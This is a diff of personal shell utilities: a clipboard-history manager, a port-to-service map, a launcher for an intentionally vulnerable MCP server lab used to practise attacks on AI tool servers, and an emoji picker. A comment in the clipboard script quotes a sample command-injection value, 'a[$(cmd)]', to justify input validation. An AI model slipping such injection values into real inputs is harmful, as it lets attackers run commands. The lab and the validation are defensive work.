# Pin lines have the form "timestamp|type|content" (content may contain '|').
show_pins() {
    if [[ ! -f "$PINS_FILE" ]] || [[ ! -s "$PINS_FILE" ]]; then
        echo -e "${YELLOW}No pinned items${NC}"
        exit 0
    fi

    echo -e "${BOLD}${CYAN}Pinned Items:${NC}"
    echo

    if command -v fzf &>/dev/null; then
        # Interactive selection
        # Pins are addressed in file order (NR), unlike history which is
        # reversed newest-first.
        selected=$(cat "$PINS_FILE" | awk -F'|' '
        {
            idx = NR
            time = $1
            type = $2
            content = $3
            # Re-join fields 4..NF: the content may itself contain "|".
            for (i=4; i<=NF; i++) content = content "|" $i

            preview = content
            if (length(preview) > 60) {
                preview = substr(preview, 1, 60) "..."
            }

            printf "%3d | %s | %-10s | %s\n", idx, time, "[" type "]", preview
        }
        ' | fzf --height=60% --layout=reverse \
            --header="Select pinned item to copy (ESC to cancel)" \
            --preview='echo {}')

        if [[ -n "$selected" ]]; then
            # The displayed index equals the line number in the pins file.
            index=$(echo "$selected" | awk '{print $1}')
            full_content=$(sed -n "${index}p" "$PINS_FILE" | cut -d'|' -f3-)
            set_clipboard "$full_content"
            echo -e "${GREEN}✓${NC} Copied pinned item to clipboard"
        fi
    else
        # Just list them
        cat "$PINS_FILE" | awk -F'|' '
        {
            idx = NR
            time = $1
            type = $2
            content = $3
            for (i=4; i<=NF; i++) content = content "|" $i

            preview = content
            if (length(preview) > 60) {
                preview = substr(preview, 1, 60) "..."
            }

            printf "%3d | %s | %-10s | %s\n", idx, time, "[" type "]", preview
        }
        '
    fi
}
|
||||||
|
|
||||||
|
# Show specific item
|
||||||
|
# Print the full content of history entry $1 (1 = most recent) to stdout.
# Exits with an error when there is no history or the index is out of range.
show_item() {
    local index=$1

    [[ -f "$HISTORY_FILE" ]] || {
        echo -e "${RED}Error:${NC} No history" >&2
        exit 1
    }

    # tac reverses the file so index 1 addresses the newest line; fields
    # 3..end are the content (which may itself contain '|').
    content=$(tac "$HISTORY_FILE" | sed -n "${index}p" | cut -d'|' -f3-)

    [[ -n "$content" ]] || {
        echo -e "${RED}Error:${NC} No item at index $index" >&2
        exit 1
    }

    echo "$content"
}
|
||||||
|
|
||||||
|
# Search history
|
||||||
|
# Search history entries (case-insensitive) and print matching lines.
# Arguments: $1 - search pattern (interpreted by grep as a basic regex)
# Output:    "time | [type] | preview" per match, preview truncated to 60 chars.
search_history() {
    local query="$1"

    if [[ ! -f "$HISTORY_FILE" ]]; then
        echo -e "${RED}Error:${NC} No history" >&2
        exit 1
    fi

    echo -e "${BOLD}${CYAN}Search results for: ${query}${NC}"
    echo

    # "--" ends option parsing so queries beginning with "-" (e.g. "-rf")
    # are treated as patterns instead of being misread as grep options.
    grep -i -- "$query" "$HISTORY_FILE" | awk -F'|' '
    {
        time = $1
        type = $2
        content = $3
        # Re-join fields 4..NF: the content may itself contain "|".
        for (i=4; i<=NF; i++) content = content "|" $i

        preview = content
        if (length(preview) > 60) {
            preview = substr(preview, 1, 60) "..."
        }

        printf "%s | %-10s | %s\n", time, "[" type "]", preview
    }
    '
}
|
||||||
|
|
||||||
|
# List recent items
|
||||||
|
# Print the 20 most recent history entries, newest first.
# The printed index matches what `show_item`/`delete_item` expect
# (1 = most recent), because tail|tac numbers from the newest line.
list_recent() {
    if [[ ! -f "$HISTORY_FILE" ]]; then
        echo -e "${YELLOW}No history${NC}"
        exit 0
    fi

    echo -e "${BOLD}${CYAN}Recent Clipboard History (last 20):${NC}"
    echo

    tail -20 "$HISTORY_FILE" | tac | awk -F'|' '
    {
        idx = NR
        time = $1
        type = $2
        content = $3
        # Re-join fields 4..NF: the content may itself contain "|".
        for (i=4; i<=NF; i++) content = content "|" $i

        preview = content
        if (length(preview) > 60) {
            preview = substr(preview, 1, 60) "..."
        }

        printf "%3d | %s | %-10s | %s\n", idx, time, "[" type "]", preview
    }
    '
}
|
||||||
|
|
||||||
|
# Statistics
|
||||||
|
# Print summary statistics: total entries, pin count, the configured
# history cap, and a per-type breakdown (most frequent first).
show_stats() {
    if [[ ! -f "$HISTORY_FILE" ]]; then
        echo -e "${YELLOW}No history${NC}"
        exit 0
    fi

    total=$(wc -l < "$HISTORY_FILE")
    # Test for the pins file explicitly: redirecting stdin from a missing
    # file would print the shell's "No such file" error to stderr before
    # a trailing 2>/dev/null could take effect.
    if [[ -f "$PINS_FILE" ]]; then
        pins=$(wc -l < "$PINS_FILE")
    else
        pins=0
    fi

    echo -e "${BOLD}${CYAN}Clipboard Statistics:${NC}"
    echo
    echo "  Total items: $total"
    echo "  Pinned items: $pins"
    echo "  Max history: $MAX_HISTORY"
    echo

    echo -e "${BOLD}${CYAN}By Type:${NC}"
    # Field 2 is the entry type; count occurrences, most frequent first.
    awk -F'|' '{print $2}' "$HISTORY_FILE" | sort | uniq -c | sort -rn | awk '
    {printf "  %-15s %d\n", $2, $1}'
}
|
||||||
|
|
||||||
|
# Delete specific item from history
|
||||||
|
# Delete history entry $1 (1 = most recent) after interactive confirmation.
delete_item() {
    local index=$1

    # Reject non-numeric indexes up front: feeding arbitrary strings into
    # the [[ ... -lt ... ]] arithmetic comparisons below would evaluate
    # them as expressions (e.g. 'a[$(cmd)]' runs the command).
    if [[ ! "$index" =~ ^[0-9]+$ ]]; then
        echo -e "${RED}Error:${NC} Index must be a number" >&2
        exit 1
    fi

    if [[ ! -f "$HISTORY_FILE" ]]; then
        echo -e "${RED}Error:${NC} No history" >&2
        exit 1
    fi

    total=$(wc -l < "$HISTORY_FILE")
    if [[ $index -lt 1 ]] || [[ $index -gt $total ]]; then
        echo -e "${RED}Error:${NC} Invalid index (1-$total)" >&2
        exit 1
    fi

    # Show what we're deleting (index 1 is the newest entry, hence tac).
    content=$(tac "$HISTORY_FILE" | sed -n "${index}p" | cut -d'|' -f3-)
    preview="${content:0:60}"
    if [[ ${#content} -gt 60 ]]; then
        preview="${preview}..."
    fi

    echo -e "${YELLOW}Delete item $index:${NC} $preview"
    echo -n "Continue? (y/N) "
    read -r response

    if [[ "$response" =~ ^[Yy]$ ]]; then
        # Delete line (remember tac reverses order)
        actual_line=$((total - index + 1))
        sed -i "${actual_line}d" "$HISTORY_FILE"
        echo -e "${GREEN}✓${NC} Deleted item $index"
    else
        echo "Cancelled"
    fi
}
|
||||||
|
|
||||||
|
# Delete pinned item
|
||||||
|
# Remove pinned entry $1 (file order, 1-based) after interactive confirmation.
delete_pin() {
    local index=$1

    # Reject non-numeric indexes before the arithmetic comparisons below
    # evaluate them as expressions (potential command injection vector).
    if [[ ! "$index" =~ ^[0-9]+$ ]]; then
        echo -e "${RED}Error:${NC} Index must be a number" >&2
        exit 1
    fi

    if [[ ! -f "$PINS_FILE" ]] || [[ ! -s "$PINS_FILE" ]]; then
        echo -e "${YELLOW}No pinned items${NC}"
        exit 0
    fi

    total=$(wc -l < "$PINS_FILE")
    if [[ $index -lt 1 ]] || [[ $index -gt $total ]]; then
        echo -e "${RED}Error:${NC} Invalid index (1-$total)" >&2
        exit 1
    fi

    # Show what we're deleting (pins are addressed in file order, no tac).
    content=$(sed -n "${index}p" "$PINS_FILE" | cut -d'|' -f3-)
    preview="${content:0:60}"
    if [[ ${#content} -gt 60 ]]; then
        preview="${preview}..."
    fi

    echo -e "${YELLOW}Unpin item $index:${NC} $preview"
    echo -n "Continue? (y/N) "
    read -r response

    if [[ "$response" =~ ^[Yy]$ ]]; then
        sed -i "${index}d" "$PINS_FILE"
        echo -e "${GREEN}✓${NC} Unpinned item $index"
    else
        echo "Cancelled"
    fi
}
|
||||||
|
|
||||||
|
# Clear history
|
||||||
|
# Empty the history file after an interactive confirmation prompt.
clear_history() {
    printf 'Clear clipboard history? (y/N) '
    read -r response
    case "$response" in
        [Yy])
            : > "$HISTORY_FILE"
            echo -e "${GREEN}✓${NC} History cleared"
            ;;
        *)
            echo "Cancelled"
            ;;
    esac
}
|
||||||
|
|
||||||
|
# Initialize
|
||||||
|
init_clip
|
||||||
|
|
||||||
|
# Parse command
|
||||||
|
if [[ $# -eq 0 ]]; then
|
||||||
|
show_history_fzf
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
case $1 in
|
||||||
|
-h|--help|help)
|
||||||
|
show_help
|
||||||
|
;;
|
||||||
|
save)
|
||||||
|
content=$(get_clipboard)
|
||||||
|
save_to_history "$content"
|
||||||
|
echo -e "${GREEN}✓${NC} Saved to history"
|
||||||
|
;;
|
||||||
|
pin)
|
||||||
|
pin_item
|
||||||
|
;;
|
||||||
|
pins)
|
||||||
|
show_pins
|
||||||
|
;;
|
||||||
|
cat)
|
||||||
|
if [[ $# -lt 2 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Item index required" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
show_item "$2"
|
||||||
|
;;
|
||||||
|
search|s)
|
||||||
|
if [[ $# -lt 2 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Search query required" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
shift
|
||||||
|
search_history "$*"
|
||||||
|
;;
|
||||||
|
list|ls|l)
|
||||||
|
list_recent
|
||||||
|
;;
|
||||||
|
delete|del|rm)
|
||||||
|
if [[ $# -lt 2 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Item index required" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
delete_item "$2"
|
||||||
|
;;
|
||||||
|
unpin)
|
||||||
|
if [[ $# -lt 2 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Item index required" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
delete_pin "$2"
|
||||||
|
;;
|
||||||
|
clear)
|
||||||
|
clear_history
|
||||||
|
;;
|
||||||
|
stats)
|
||||||
|
show_stats
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo -e "${RED}Error:${NC} Unknown command: $1" >&2
|
||||||
|
echo "Run 'clip --help' for usage" >&2
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
34
scripts/common_ports.py
Normal file
34
scripts/common_ports.py
Normal file
|
|
@ -0,0 +1,34 @@
|
||||||
|
# Mapping of well-known TCP/UDP port numbers to their conventional service
# names, for quick lookups (e.g. when annotating scan output).
ports_and_services: dict[int, str] = {
    20: "ftp-data",
    21: "ftp",
    22: "ssh",
    23: "telnet",
    25: "smtp",
    53: "dns",
    67: "dhcp",
    68: "dhcp",
    69: "tftp",
    80: "http",
    110: "pop3",
    123: "ntp",
    137: "netbios-ns",
    138: "netbios-dgm",
    139: "netbios-ssn",
    143: "imap",
    161: "snmp",
    162: "snmp-trap",
    179: "bgp",
    443: "https",
    445: "microsoft-ds",
    465: "smtps",
    514: "syslog",
    587: "submission",
    631: "ipp",
    993: "imaps",
    995: "pop3s",
    3306: "mysql",
    3389: "rdp",
    5432: "postgresql",
    5900: "vnc",
    8080: "http-proxy"
}
|
||||||
397
scripts/dvmcp
Executable file
397
scripts/dvmcp
Executable file
|
|
@ -0,0 +1,397 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: dvmcp
# Description: Damn Vulnerable MCP Server launcher
# Usage: dvmcp start|stop|status|logs|build

VERSION="1.1.0"

# Colors
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly CYAN='\033[0;36m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'

# Container settings
CONTAINER_NAME="dvmcp"
IMAGE="dvmcp:latest"
# Informational only; the actual port mappings are individual -p flags
# passed to `docker run` in start_dvmcp.
PORT_RANGE="9001-9010"

# Config file paths
# While the CTF runs, the production Claude Code settings file is backed up
# and replaced with a CTF-only one; the state file marks that CTF mode is on.
SETTINGS_DIR="${HOME}/.claude"
PROD_CONFIG="${SETTINGS_DIR}/settings.json"
CTF_CONFIG="${SETTINGS_DIR}/settings-ctf.json"
BACKUP_CONFIG="${SETTINGS_DIR}/settings-prod-backup.json"
CONFIG_STATE_FILE="${SETTINGS_DIR}/.dvmcp-config-state"
|
||||||
|
|
||||||
|
# Print usage, command summary, security notes, and first-time setup steps.
show_help() {
    echo -e "${BOLD}dvmcp${NC} - Damn Vulnerable MCP Server Launcher v${VERSION}"
    echo
    echo -e "${BOLD}USAGE:${NC}"
    echo "  dvmcp <command>"
    echo
    echo -e "${BOLD}COMMANDS:${NC}"
    echo -e "  ${CYAN}build${NC}    Build Docker image from Dockerfile"
    echo -e "  ${CYAN}start${NC}    Start DVMCP server"
    echo -e "  ${CYAN}stop${NC}     Stop DVMCP server"
    echo -e "  ${CYAN}restart${NC}  Restart DVMCP server"
    echo -e "  ${CYAN}status${NC}   Check if running"
    echo -e "  ${CYAN}logs${NC}     Show container logs"
    echo -e "  ${CYAN}shell${NC}    Open shell in container"
    echo
    echo -e "${BOLD}EXAMPLES:${NC}"
    echo "  dvmcp build     # Build image (first time setup)"
    echo "  dvmcp start     # Launch DVMCP server"
    echo "  dvmcp stop      # Stop DVMCP server"
    echo "  dvmcp logs      # View logs"
    echo
    echo -e "${BOLD}ACCESS:${NC}"
    echo "  Ports: ${BOLD}9001-9010${NC} (10 challenge instances)"
    echo "  Test: ${BOLD}curl http://localhost:9001${NC}"
    echo
    echo -e "${BOLD}ABOUT:${NC}"
    echo "  Damn Vulnerable MCP Server - Intentionally vulnerable MCP implementation"
    echo "  Perfect for testing MCP security vulnerabilities"
    echo "  GitHub: https://github.com/harishsg993010/damn-vulnerable-MCP-server"
    echo
    echo -e "${BOLD}SECURITY:${NC}"
    echo "  This script automatically manages Claude Code config isolation:"
    echo -e "  - ${GREEN}start${NC}: Backs up production config, loads CTF-only config"
    echo -e "  - ${GREEN}stop${NC}: Restores production config automatically"
    echo -e "  - ${YELLOW}Your production MCP servers are protected${NC}"
    echo
    echo -e "${BOLD}FIRST TIME SETUP:${NC}"
    echo "  1. Clone repo: git clone https://github.com/harishsg993010/damn-vulnerable-MCP-server.git"
    echo "  2. cd damn-vulnerable-MCP-server/"
    echo "  3. Build: dvmcp build"
    echo "  4. Start: dvmcp start"
    echo -e "  5. ${BOLD}Restart Claude Code${NC} to load CTF config"
}
|
||||||
|
|
||||||
|
# Abort the script with an error unless the docker CLI is available on PATH.
check_docker() {
    if command -v docker &>/dev/null; then
        return 0
    fi
    echo -e "${RED}Error:${NC} Docker not installed"
    exit 1
}
|
||||||
|
|
||||||
|
# Succeed (status 0) when the $IMAGE tag exists among local Docker images.
# The grep anchors make the repository:tag match exact, not a substring.
check_image_exists() {
    docker images --format '{{.Repository}}:{{.Tag}}' | grep -q "^${IMAGE}$"
}
|
||||||
|
|
||||||
|
# Write the CTF-only Claude Code settings file if it does not exist yet.
# It maps "Challenge N" MCP servers to the local DVMCP SSE endpoints on
# ports 9001-9010. The heredoc delimiter is quoted ('EOF') so the JSON is
# written literally, with no shell expansion.
create_ctf_config_template() {
    if [[ ! -f "$CTF_CONFIG" ]]; then
        echo -e "${CYAN}[*]${NC} Creating CTF config template at ${CTF_CONFIG}..."
        cat > "$CTF_CONFIG" <<'EOF'
{
  "mcpServers": {
    "Challenge 1": {
      "command": "npx",
      "args": ["mcp-remote", "http://127.0.0.1:9001/sse"]
    },
    "Challenge 2": {
      "command": "npx",
      "args": ["mcp-remote", "http://127.0.0.1:9002/sse"]
    },
    "Challenge 3": {
      "command": "npx",
      "args": ["mcp-remote", "http://127.0.0.1:9003/sse"]
    },
    "Challenge 4": {
      "command": "npx",
      "args": ["mcp-remote", "http://127.0.0.1:9004/sse"]
    },
    "Challenge 5": {
      "command": "npx",
      "args": ["mcp-remote", "http://127.0.0.1:9005/sse"]
    },
    "Challenge 6": {
      "command": "npx",
      "args": ["mcp-remote", "http://127.0.0.1:9006/sse"]
    },
    "Challenge 7": {
      "command": "npx",
      "args": ["mcp-remote", "http://127.0.0.1:9007/sse"]
    },
    "Challenge 8": {
      "command": "npx",
      "args": ["mcp-remote", "http://127.0.0.1:9008/sse"]
    },
    "Challenge 9": {
      "command": "npx",
      "args": ["mcp-remote", "http://127.0.0.1:9009/sse"]
    },
    "Challenge 10": {
      "command": "npx",
      "args": ["mcp-remote", "http://127.0.0.1:9010/sse"]
    }
  }
}
EOF
        echo -e "${GREEN}✓${NC} CTF config created"
    fi
}
|
||||||
|
|
||||||
|
# Switch Claude Code to the CTF-only config:
#   1. refuse if no production config exists,
#   2. no-op if the state file says CTF mode is already active,
#   3. back up the production config, then overwrite it with the CTF one,
#   4. write the state file marking CTF mode.
# Idempotent thanks to step 2; the state file is what restore_prod_config
# and the signal traps key off.
swap_to_ctf_config() {
    if [[ ! -f "$PROD_CONFIG" ]]; then
        echo -e "${RED}Error:${NC} Production config not found at ${PROD_CONFIG}"
        exit 1
    fi

    # Check if we're already in CTF mode
    if [[ -f "$CONFIG_STATE_FILE" ]]; then
        echo -e "${YELLOW}⚠${NC} Already in CTF mode"
        return 0
    fi

    # Create CTF config if it doesn't exist
    create_ctf_config_template

    echo -e "${CYAN}[*]${NC} Backing up production config..."
    cp "$PROD_CONFIG" "$BACKUP_CONFIG"

    echo -e "${CYAN}[*]${NC} Switching to CTF config..."
    cp "$CTF_CONFIG" "$PROD_CONFIG"

    # Mark that we're in CTF mode
    echo "CTF_MODE_ACTIVE" > "$CONFIG_STATE_FILE"

    echo -e "${GREEN}✓${NC} Switched to CTF config"
    echo -e "${YELLOW}Note:${NC} Production MCP servers are disabled until you stop DVMCP"
}
|
||||||
|
|
||||||
|
# Restore the production Claude Code config from the backup taken by
# swap_to_ctf_config, then remove the backup and the CTF-mode state file.
# No-op when not in CTF mode; hard error if the backup has gone missing
# (the production config cannot be recovered automatically in that case).
restore_prod_config() {
    if [[ ! -f "$CONFIG_STATE_FILE" ]]; then
        echo -e "${YELLOW}⚠${NC} Already using production config"
        return 0
    fi

    if [[ ! -f "$BACKUP_CONFIG" ]]; then
        echo -e "${RED}Error:${NC} Backup config not found at ${BACKUP_CONFIG}"
        echo -e "${YELLOW}Warning:${NC} Cannot restore production config!"
        exit 1
    fi

    echo -e "${CYAN}[*]${NC} Restoring production config..."
    cp "$BACKUP_CONFIG" "$PROD_CONFIG"

    # Clean up backup and state file
    rm -f "$BACKUP_CONFIG" "$CONFIG_STATE_FILE"

    echo -e "${GREEN}✓${NC} Production config restored"
}
|
||||||
|
|
||||||
|
# Signal-trap handler: if the script terminates while CTF mode is active
# (state file present), restore the production config so the user is not
# left with the CTF settings by accident.
cleanup_on_exit() {
    # If script exits unexpectedly while in CTF mode, restore production config
    if [[ -f "$CONFIG_STATE_FILE" ]]; then
        echo
        echo -e "${YELLOW}[!]${NC} Script interrupted, restoring production config..."
        restore_prod_config
    fi
}
|
||||||
|
|
||||||
|
# Register cleanup trap for abnormal termination (Ctrl-C / kill) only.
# Trapping EXIT here would undo the config swap the moment a successful
# `dvmcp start` finishes: the script exits normally while the CTF state
# file still exists, so the EXIT handler would immediately restore the
# production config and defeat the isolation feature.
trap 'cleanup_on_exit; exit 130' INT
trap 'cleanup_on_exit; exit 143' TERM
|
||||||
|
|
||||||
|
# Build the DVMCP Docker image from a Dockerfile in the current directory.
# The user is expected to run this from a checkout of the upstream repo;
# prints setup instructions and exits if no Dockerfile is found.
build_dvmcp() {
    # Check if Dockerfile exists in current directory
    if [[ ! -f "Dockerfile" ]]; then
        echo -e "${RED}Error:${NC} Dockerfile not found in current directory"
        echo
        echo -e "${YELLOW}Expected location:${NC} ./Dockerfile"
        echo
        echo -e "${CYAN}To build the image:${NC}"
        echo "  1. cd ~/path/to/damn-vulnerable-MCP-server/"
        echo "  2. Run: dvmcp build"
        echo
        echo -e "${CYAN}Or clone the repo:${NC}"
        echo "  git clone https://github.com/harishsg993010/damn-vulnerable-MCP-server.git"
        exit 1
    fi

    echo -e "${CYAN}[*]${NC} Building DVMCP Docker image..."
    echo -e "${YELLOW}Note:${NC} This may take several minutes..."

    # Explicit if keeps a build failure from silently passing under set -e.
    if docker build -t "$IMAGE" . ; then
        echo -e "${GREEN}✓${NC} DVMCP image built successfully"
        echo -e "${CYAN}[*]${NC} You can now run: ${BOLD}dvmcp start${NC}"
    else
        echo -e "${RED}✗${NC} Build failed"
        exit 1
    fi
}
|
||||||
|
|
||||||
|
# Start the DVMCP container: verify the image exists, swap Claude Code to
# the CTF-only config, then either reuse an existing container (running or
# stopped) or create a new one with ports 9001-9010 published.
start_dvmcp() {
    # Check if image exists
    if ! check_image_exists; then
        echo -e "${RED}Error:${NC} DVMCP image not found"
        echo -e "${YELLOW}Run:${NC} ${BOLD}dvmcp build${NC} first"
        exit 1
    fi

    # Swap to CTF config BEFORE starting container
    swap_to_ctf_config
    echo

    # `docker ps -a` sees stopped containers too; plain `docker ps` only
    # running ones — the nesting distinguishes "running" from "stopped".
    if docker ps -a --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
            echo -e "${YELLOW}⚠${NC} DVMCP already running"
            echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:9001-9010${NC}"
            return 0
        else
            echo -e "${CYAN}[*]${NC} Starting existing container..."
            docker start "$CONTAINER_NAME"
        fi
    else
        echo -e "${CYAN}[*]${NC} Starting DVMCP server..."
        echo -e "${YELLOW}Note:${NC} Mapping ports 9001-9010 for challenge instances"
        docker run -d --name "$CONTAINER_NAME" \
            -p 9001:9001 \
            -p 9002:9002 \
            -p 9003:9003 \
            -p 9004:9004 \
            -p 9005:9005 \
            -p 9006:9006 \
            -p 9007:9007 \
            -p 9008:9008 \
            -p 9009:9009 \
            -p 9010:9010 \
            "$IMAGE"
    fi

    # Give the container a moment to bring its services up.
    sleep 3

    echo -e "${GREEN}✓${NC} DVMCP server started"
    echo
    echo -e "${BOLD}Challenge Instances:${NC}"
    echo -e "  ${CYAN}Port 9001:${NC} http://localhost:9001"
    echo -e "  ${CYAN}Port 9002:${NC} http://localhost:9002"
    echo -e "  ${CYAN}Port 9003:${NC} http://localhost:9003"
    echo -e "  ${CYAN}Port 9004:${NC} http://localhost:9004"
    echo -e "  ${CYAN}Port 9005:${NC} http://localhost:9005"
    echo -e "  ${CYAN}Port 9006:${NC} http://localhost:9006"
    echo -e "  ${CYAN}Port 9007:${NC} http://localhost:9007"
    echo -e "  ${CYAN}Port 9008:${NC} http://localhost:9008"
    echo -e "  ${CYAN}Port 9009:${NC} http://localhost:9009"
    echo -e "  ${CYAN}Port 9010:${NC} http://localhost:9010"
    echo
    echo -e "${YELLOW}Tip:${NC} Test with: ${BOLD}curl http://localhost:9001${NC}"
    echo -e "${YELLOW}Security:${NC} ${GREEN}Production MCP servers isolated${NC}"
    echo
    echo -e "${BOLD}⚠ IMPORTANT:${NC} Restart Claude Code to load CTF config"
}
|
||||||
|
|
||||||
|
# Stop the DVMCP container (if running), then always restore the production
# Claude Code config — the restore runs even when the container was already
# stopped, so a leftover CTF config is cleaned up either way.
stop_dvmcp() {
    if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        echo -e "${CYAN}[*]${NC} Stopping DVMCP server..."
        docker stop "$CONTAINER_NAME"
        echo -e "${GREEN}✓${NC} DVMCP server stopped"
    else
        echo -e "${YELLOW}⚠${NC} DVMCP not running"
    fi

    # Restore production config AFTER stopping container
    echo
    restore_prod_config
    echo
    echo -e "${BOLD}⚠ IMPORTANT:${NC} Restart Claude Code to load production config"
}
|
||||||
|
|
||||||
|
# Full stop/start cycle. Note this also round-trips the config swap:
# stop restores the production config, start re-enables the CTF one.
restart_dvmcp() {
    stop_dvmcp
    sleep 2
    start_dvmcp
}
|
||||||
|
|
||||||
|
# Report container state (running/stopped), active port mappings, and which
# Claude Code config is currently in effect (CTF vs production).
show_status() {
    if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        echo -e "${GREEN}●${NC} DVMCP server is ${GREEN}running${NC}"
        echo
        echo -e "${BOLD}Active Ports:${NC}"
        docker port "$CONTAINER_NAME" 2>/dev/null | while IFS= read -r line; do
            echo -e "  ${CYAN}${line}${NC}"
        done
        echo
        docker ps --format "table {{.Names}}\t{{.Status}}\t{{.Ports}}" | grep -E "(NAMES|${CONTAINER_NAME})"
    else
        echo -e "${RED}●${NC} DVMCP server is ${RED}stopped${NC}"

        if ! check_image_exists; then
            echo
            echo -e "${YELLOW}Note:${NC} Image not built yet. Run: ${BOLD}dvmcp build${NC}"
        fi
    fi

    echo
    echo -e "${BOLD}Config Status:${NC}"
    # The state file is the single source of truth for CTF mode.
    if [[ -f "$CONFIG_STATE_FILE" ]]; then
        echo -e "  ${CYAN}Mode:${NC}   CTF (isolated)"
        echo -e "  ${CYAN}Active:${NC} ${CTF_CONFIG}"
        echo -e "  ${CYAN}Backup:${NC} ${BACKUP_CONFIG}"
    else
        echo -e "  ${CYAN}Mode:${NC}   Production"
        echo -e "  ${CYAN}Active:${NC} ${PROD_CONFIG}"
    fi
}
|
||||||
|
|
||||||
|
# Follow the container's logs; errors out when the container is not running.
show_logs() {
    if ! docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        echo -e "${RED}Error:${NC} DVMCP server not running"
        exit 1
    fi
    docker logs -f "$CONTAINER_NAME"
}
|
||||||
|
|
||||||
|
# Open an interactive shell in the running container; tries bash first and
# falls back to sh (for minimal images without bash).
open_shell() {
    if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        echo -e "${CYAN}[*]${NC} Opening shell in DVMCP container..."
        docker exec -it "$CONTAINER_NAME" /bin/bash || docker exec -it "$CONTAINER_NAME" /bin/sh
    else
        echo -e "${RED}Error:${NC} DVMCP server not running"
        exit 1
    fi
}
|
||||||
|
|
||||||
|
# Main
# Docker is a hard requirement for every subcommand.
check_docker

# No arguments or an explicit help flag prints usage and exits.
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
    show_help
    exit 0
fi

case "$1" in
    build)
        build_dvmcp
        ;;
    start|up)
        start_dvmcp
        ;;
    stop|down)
        stop_dvmcp
        ;;
    restart)
        restart_dvmcp
        ;;
    status)
        show_status
        ;;
    logs)
        show_logs
        ;;
    shell|sh|bash)
        open_shell
        ;;
    *)
        echo -e "${RED}Error:${NC} Unknown command: $1"
        echo "Run 'dvmcp --help' for usage"
        exit 1
        ;;
esac
|
||||||
552
scripts/emoji
Executable file
552
scripts/emoji
Executable file
|
|
@ -0,0 +1,552 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: emoji
|
||||||
|
# Description: Interactive emoji picker with fuzzy search
|
||||||
|
# Source: Inspired by https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||||
|
# Usage: emoji # interactive picker
|
||||||
|
# emoji smile # search for "smile"
|
||||||
|
|
||||||
|
# Curated emoji database (emoji + keywords)
|
||||||
|
emojis="😀 grinning face grin happy smile teeth cheerful
|
||||||
|
😃 smiley smile happy face open mouth teeth yay
|
||||||
|
😄 smile happy face grin laugh grinning eyes closed
|
||||||
|
😁 beaming smile happy grin teeth eyes closed
|
||||||
|
😆 laughing haha hahaha lol rofl laugh grinning squinting
|
||||||
|
😅 grinning sweat relief phew close call nervous laugh
|
||||||
|
🤣 rolling floor rofl laugh crying funny hilarious
|
||||||
|
😂 tears joy laugh cry funny lol crying
|
||||||
|
🙂 slightly smiling smile happy nice
|
||||||
|
🙃 upside down smile sarcastic silly
|
||||||
|
😉 wink flirt winky playful tease
|
||||||
|
😊 smiling eyes smile happy blush shy
|
||||||
|
😇 smiling halo angel innocent saint good
|
||||||
|
🥰 smiling hearts love adore crush hearts eyes
|
||||||
|
😍 heart eyes love crush hearts smiling loving
|
||||||
|
🤩 star eyes starstruck excited wow amazed
|
||||||
|
😘 blowing kiss love smooch mwah
|
||||||
|
😗 kissing smile kiss puckered
|
||||||
|
☺️ smiling face blushing happy relaxed
|
||||||
|
😚 kissing closed eyes kiss affection
|
||||||
|
😙 kissing smiling eyes kiss happy
|
||||||
|
🥲 smiling tear touched grateful sad happy bittersweet
|
||||||
|
😋 yummy delicious tasty savoring food yum
|
||||||
|
😛 tongue playful silly teasing
|
||||||
|
😜 winking tongue playful teasing kidding
|
||||||
|
🤪 zany crazy wild silly wacky goofy
|
||||||
|
😝 squinting tongue playful teasing horrible taste
|
||||||
|
🤑 money mouth dollar rich greedy cash
|
||||||
|
🤗 hugging hug embrace care support
|
||||||
|
🤭 hand mouth oops giggle secret tee hee
|
||||||
|
🫢 eyes hand peeking surprised shocked
|
||||||
|
🫣 peeking through fingers scared peek boo hide
|
||||||
|
🤫 shushing shh quiet secret silence hush
|
||||||
|
🤔 thinking hmm wonder ponder contemplative
|
||||||
|
🫡 salute respect military yes sir
|
||||||
|
🤐 zipper mouth secret sealed silent quiet
|
||||||
|
🤨 raised eyebrow skeptical suspicious doubt questioning
|
||||||
|
😐 neutral face blank expressionless meh
|
||||||
|
😑 expressionless annoyed blank dead inside
|
||||||
|
😶 no mouth quiet silent speechless
|
||||||
|
🫥 dotted line invisible disappearing transparent
|
||||||
|
😶🌫️ face clouds confused foggy unclear
|
||||||
|
😏 smirking smirk sly confident knowing
|
||||||
|
😒 unamused annoyed unimpressed disappointed meh
|
||||||
|
🙄 rolling eyes annoyed duh whatever sarcastic
|
||||||
|
😬 grimacing awkward uncomfortable eek cringe teeth
|
||||||
|
😮💨 exhaling sigh relief phew tired
|
||||||
|
🤥 lying pinocchio lie nose growing
|
||||||
|
🫨 shaking vibrating earthquake scared nervous
|
||||||
|
😌 relieved calm peaceful content relaxed
|
||||||
|
😔 pensive sad disappointed dejected down
|
||||||
|
😪 sleepy tired yawn exhausted drowsy
|
||||||
|
